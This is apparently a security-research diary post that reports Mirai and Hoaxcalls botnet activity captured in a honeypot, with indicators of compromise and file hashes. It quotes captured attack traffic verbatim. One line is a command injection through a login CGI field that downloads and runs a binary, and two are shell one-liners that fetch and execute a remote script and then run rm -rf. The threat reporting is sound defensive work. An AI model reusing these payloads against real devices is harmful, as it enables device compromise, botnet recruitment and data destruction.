Mirai Botnet Activity

Published: 2020-06-13
Last Updated: 2020-06-13 18:35:15 UTC
by Guy Bruneau (Version: 1)
0 comment(s)

This past week, I noticed new activity from the Mirai botnet in my honeypot. The sample log with the IP and file associated with the first log appears to have been taken down (96.30.193.26) which appeared multiple times this week including today. However, the last two logs from today are still active which is using a Bash script to download multiple exploits targeting various device types (MIPS, ARM4-7, MPSL, x86, PPC, M68k). Something else of interest is the User-Agent: XTC and the name viktor which appear to be linked to XTC IRC Botnet, aka Hoaxcalls.

  • 20200613-025717: 192.168.25.9:80-115.85.32.210:55065 data 'POST /cgi-bin/mainfunction.cgi HTTP/1.1\r\nUser-Agent: XTC\r\nHost: 127.0.0.1\r\nContent-Length: 189\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\n\r\naction=login&keyPath='wget${IFS}http://96.30.193.26/arm7${IFS}-O${IFS}/tmp/viktor;${IFS}chmod${IFS}777${IFS}/tmp/viktor;${IFS}/tmp/viktor'&loginUser=a&loginPwd=a\r\n\r\n'
  • 20200613-101614: 192.168.25.9:8088-36.82.97.160:41885 data 'cd /tmp; wget http://185.172.111.214/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; rm -rf *\r\n\r\n'
  • 20200613-101617: 192.168.25.9:8088-36.82.97.160:33090 data 'cd /tmp; wget http://185.172.111.214/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; rm -rf *\r\n\r\n'

Indicators of Compromise

  • http://96.30.193[.]26/arm7
  • http://185.172.111[.]214/8UsA[.]sh
  • User-Agent: XTC

Suspisious Files and Scripts:

  • UnHAnaAW.sh4 - 5d646c4f5d1793a6070bb03b069f263529b4bc470ab4d5960ae55a211eb9b2f1
  • 8UsA.sh - 590d00e051703e55be2ad10fa94eadc499262bf8a62190a648a7a2756fd31862

[1] https://www.virustotal.com/gui/file/5d646c4f5d1793a6070bb03b069f263529b4bc470ab4d5960ae55a211eb9b2f1/detection
[2] https://security.radware.com/ddos-threats-attacks/threat-advisories-attack-reports/hoaxcalls-evolution/
[3] https://blog.radware.com/security/botnets/2020/05/whos-viktor-tracking-down-the-xtc-polaris-botnets/
[4] https://isc.sans.edu/ipinfo.html?ip=115.85.32.210
[5] https://isc.sans.edu/ipinfo.html?ip=185.172.111.214
[6] https://isc.sans.edu/ipinfo.html?ip=96.30.193.26
[7] https://isc.sans.edu/ipinfo.html?ip=36.82.97.160

-----------
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

0 comment(s)

Comments


Diary Archives